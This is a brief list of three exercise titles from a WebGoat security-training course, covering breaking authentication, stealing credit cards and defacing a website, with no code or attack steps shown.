i. Hands-On Testing Exercise: WebGoat – Challenge Stage 1 – Break Authentication
ii. Hands-On Testing Exercise: WebGoat – Challenge Stage 2 – Steal the Credit Cards
iii. Hands-On Testing Exercise: WebGoat – Challenge Stage 3 – Deface the Web Site